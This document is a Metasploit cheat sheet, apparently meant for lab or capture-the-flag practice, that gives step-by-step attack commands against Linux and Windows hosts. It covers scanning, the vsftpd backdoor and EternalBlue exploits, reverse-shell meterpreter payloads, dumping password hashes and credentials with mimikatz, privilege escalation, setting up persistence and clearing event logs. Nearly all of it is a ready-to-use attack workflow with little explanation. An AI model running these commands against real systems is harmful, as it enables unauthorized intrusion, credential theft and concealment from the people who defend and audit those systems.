๐ŸŒ 1.Start Metasploit Console

sudo systemctl start postgresql
msfconsole

Initialize the Metasploit Database (First Time Only)

msfdb init

๐Ÿ” 2. Scanning Targets

Quick Target Discovery

nmap -sn 10.10.10.0/24

Full Port + Version Scan (Integrated with Metasploit DB)

db_nmap -sC -sV -O -Pn 10.10.10.129

View Discovered Hosts & Services

hosts
services

3. Exploit Search and Module Use

Search by service name or CVE

search vsftpd
search type:exploit name:smb

Load a Module

use exploit/unix/ftp/vsftpd_234_backdoor

Explore Module Info

info        # Shows full module details (author, platform, options, etc)
show options   # Required + optional settings (RHOSTS, LHOST, etc)
show advanced  # Advanced options like threads, timeouts, proxies
show payloads  # Compatible payloads for this exploit

4. Linux Exploitation Workflow

Example: FTP Backdoor

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.10.129
set payload cmd/unix/interact
run

If Shell is Basic: Upgrade

python3 -c 'import pty; pty.spawn("/bin/bash")'

Or Use Web Delivery

use exploit/multi/script/web_delivery
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
run

Post-Exploitation (Linux)

sessions -i 1
getuid
sysinfo

Enumerate OS and Configs

run post/linux/gather/enum_os
run post/linux/gather/enum_configs

Dump Password Hashes

download /etc/passwd
download /etc/shadow
john shadow --wordlist=/usr/share/wordlists/rockyou.txt

Local Exploit Suggestion

run post/multi/recon/local_exploit_suggester

Example Local Root Exploit

use exploit/linux/local/dirty_cow
set SESSION 1
run

Confirm Root

id
whoami

5. Windows Exploitation Workflow

Example: EternalBlue

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.130
set LHOST <your_ip>
set payload windows/x64/meterpreter/reverse_tcp
run

Session Handling

sessions
sessions -i 1
sysinfo
getuid

Post-Exploitation (Windows)

Dump Hashes

hashdump
load kiwi
kiwi_cmd "lsadump::sam"

Process Migration

ps
migrate <pid>
getpid

Privilege Escalation

getsystem

Or use:

use exploit/windows/local/bypassuac
set SESSION 1
run

Suggested Priv Esc Modules

run post/windows/escalate/ms10_015_kitrap0d

Credential Dumping

kiwi_cmd "creds_wdigest"
kiwi_cmd "kerberos::list"

Persistence

run persistence -U -i 5 -p 4444 -r <your_ip>

Clear Logs

clearev

๐Ÿ“ 6. Metasploit File Management

Upload / Download Files

upload evil.exe
download C:\\Users\\Admin\\Desktop\\flag.txt

7. Cheatsheet Commands

Task                    Command
----------------------  --------------------------------
Start console           msfconsole
Scan with nmap          db_nmap -sC -sV <ip>
List hosts/services     hosts, services
Search module           search <name>
Use module              use <exploit>
Show options            show options, show advanced
Show payloads           show payloads
Run exploit             run or exploit
Manage sessions         sessions -i <id>
Hashdump                hashdump
Post modules            run post/...
Load Kiwi (mimikatz)    load kiwi
File actions            upload, download
Clean logs (Windows)    clearev

Tools + Resources

  • searchsploit: offline exploit search
  • john: password cracking
  • nmap: port scanning
  • linpeas.sh, winpeas.exe: privilege escalation enumeration scripts for Linux and Windows
  • LOLBAS: catalogue of native Windows binaries usable for living-off-the-land techniques
  • GTFOBins: Linux privilege escalation